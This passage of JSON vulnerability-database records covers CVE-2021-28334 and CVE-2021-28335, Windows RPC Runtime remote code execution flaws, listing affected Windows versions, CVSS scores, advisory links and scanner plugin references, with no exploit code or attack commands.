"cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2021-28334"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["NVD-CWE-noinfo"], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-04-20T09:36:35", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28334"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-20T09:36:35", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}, {"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28334", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28334"}], "hash": "8d5fc1373a0d3d384b6632dcaebba52a4389706823da63edd9d38c4c07c0553f", "hashmap": [{"hash": "d8397aaca09c3d41cbbd37f93b216f7e", "key": "cpe23"}, {"hash": "7ac4e4098c4cd2fc04dd3bf4eee90edf", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "5994be0882256a33d08093d7d70cfb2f", "key": "cvelist"}, {"hash": "fcdea327421c8e11751cf5431948c1c0", "key": "modified"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d5b812c11bd119f970b8a32c5b252c9e", "key": "affectedSoftware"}, {"hash": "56dd3b90fdad5434b2e237c2d2c62919", "key": "cpeConfiguration"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "5bd79a59b38bcbf1f5bd0f23b27d28a0", "key": "description"}, {"hash": "ec21884b25163cbc8fb0439362ea4ad8", "key": "title"}, {"hash": "4c2fa4bb9c91c4586e1cede93445cfd1", "key": "extraReferences"}, {"hash": "d370d473ba1bd1721d669ef98e2aeebb", "key": "cwe"}, {"hash": "c11c7138ce1c569465cc356eec10f4f8", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "122bdba5509c507afa2962a93b3d1c93", "key": "cpe"}, {"hash": "797434013b6a54d859a5263bc756e7a6", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28334", "id": "CVE-2021-28334", "immutableFields": [], "lastseen": "2021-04-20T09:36:35", "modified": "2021-04-19T19:17:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28334"], "reporter": "cve@mitre.org", "title": "CVE-2021-28334", "type": "cve", "viewCount": 1}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 2, "lastseen": "2021-04-20T09:36:35"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "d5b812c11bd119f970b8a32c5b252c9e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "122bdba5509c507afa2962a93b3d1c93"}, {"key": "cpe23", "hash": "d8397aaca09c3d41cbbd37f93b216f7e"}, {"key": "cpeConfiguration", "hash": "64c56abb30602eab96958881fd107551"}, {"key": "cvelist", "hash": "5994be0882256a33d08093d7d70cfb2f"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "3bf2877e19b91d4143ea460e43ce9041"}, {"key": "cvss3", "hash": "797434013b6a54d859a5263bc756e7a6"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "5bd79a59b38bcbf1f5bd0f23b27d28a0"}, {"key": "extraReferences", "hash": "4c2fa4bb9c91c4586e1cede93445cfd1"}, {"key": "href", "hash": "7ac4e4098c4cd2fc04dd3bf4eee90edf"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "fcdea327421c8e11751cf5431948c1c0"}, {"key": "published", "hash": "466c447b6119a8be9494fae20b17c9a1"}, {"key": "references", "hash": "c11c7138ce1c569465cc356eec10f4f8"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "ec21884b25163cbc8fb0439362ea4ad8"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "367d595ea35419117e4239cdb57fc95dae18441b99867f9c493147a9ecd82b41", "viewCount": 29, "enchantments": {"dependencies": {"references": [{"type": "mscve", "idList": ["MS:CVE-2021-28334"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001330.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001339.NASL"]}, {"type": "kaspersky", "idList": ["KLA12142", "KLA12139"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}], "modified": "2021-04-28T11:49:18", "rev": 2}, "score": {"value": 3.8, "vector": "NONE", "modified": "2021-04-28T11:49:18", "rev": 2}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}, {"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}]}}, "objectVersion": "1.5", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28334", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28334"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null}, {"id": "CVE-2021-28335", "bulletinFamily": "NVD", "title": "CVE-2021-28335", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "published": "2021-04-13T20:15:00", "modified": "2021-04-19T19:25:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28335", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28335"], "cvelist": ["CVE-2021-28335"], "immutableFields": [], "type": "cve", "lastseen": "2021-04-28T11:49:18", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": 